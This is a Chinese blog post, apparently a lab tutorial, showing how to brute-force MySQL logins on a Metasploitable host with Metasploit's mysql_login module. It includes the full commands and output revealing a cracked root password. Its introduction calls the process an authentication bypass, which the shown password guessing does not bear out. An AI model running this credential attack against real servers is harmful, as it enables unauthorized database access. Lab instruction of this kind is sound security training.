渗透攻击Mysql数据库服务

admin

141760
文章

117
评论

2025年5月27日14:32:03评论3 views字数 1412阅读4分42秒阅读模式

在Metasploitable系统中，Mysql的身份认证存在漏洞，这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库。

启动MSFCONSOLE

扫描所有有效的Mysql模块。

输出信息显示Mysql可用模块，在模块中，选择渗透工具模块

这里使用Mysql扫描模块

msf6 > use auxiliary/scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.145RHOSTS => 192.168.1.145msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txtuser_file => user.txtmsf6 auxiliary(scanner/mysql/mysql_login) > set pass_file passwd.txtpass_file => passwd.txtmsf6 auxiliary(scanner/mysql/mysql_login) > set STOP_NO_SUCCESS true[!] Unknown datastore option: STOP_NO_SUCCESS. Did you mean STOP_ON_SUCCESS?STOP_NO_SUCCESS => truemsf6 auxiliary(scanner/mysql/mysql_login) > exploit

为攻击目标指定目标系统IP，用户文件，密码文件

[+] 192.168.1.145:3306    - 192.168.1.145:3306 - Found remote MySQL version 5.7.44[!] 192.168.1.145:3306    - No active DB -- Credential data will not be saved![-] 192.168.1.145:3306    - 192.168.1.145:3306 - LOGIN FAILED: root: (Incorrect: Access denied for user 'root'@'192.168.1.103' (using password: NO))[-] 192.168.1.145:3306    - 192.168.1.145:3306 - LOGIN FAILED: root:Ljj!123456 (Incorrect: Access denied for user 'root'@'192.168.1.103' (using password: YES))[+] 192.168.1.145:3306    - 192.168.1.145:3306 - Success: 'root:Ljj@123456'[*] 192.168.1.145:3306    - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

输出信息是渗透攻击的一个过程，尝试使用指定的用户名和密码文件中的用户名和密码连接mysql服务器，从输出信息中可以看出，已经测试出Mysql数据库服务器的用户名和密码为root和Ljj@123456

原文始发于微信公众号（运维星火燎原）：渗透攻击Mysql数据库服务

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

渗透攻击Mysql数据库服务

LFI漏洞攻击技巧

IoM v0.1.0 代替CobaltStrike的最后四块碎片

通过 Intel ShaderCache 目录绕过 UAC

【供应链攻击】官方 XRP Ledger NPM 包中发现后门

常见EDU漏洞，附实战案例

深度研究 | 解构国内外代表性Agentic AI系统风险模型

OWASP LLM TOP10安全风险解析

记一次接口导致的漏洞

mitmproxy实现虚拟机流量转发

二维码功能点SRC漏洞挖掘

发表评论

在线咨询

微信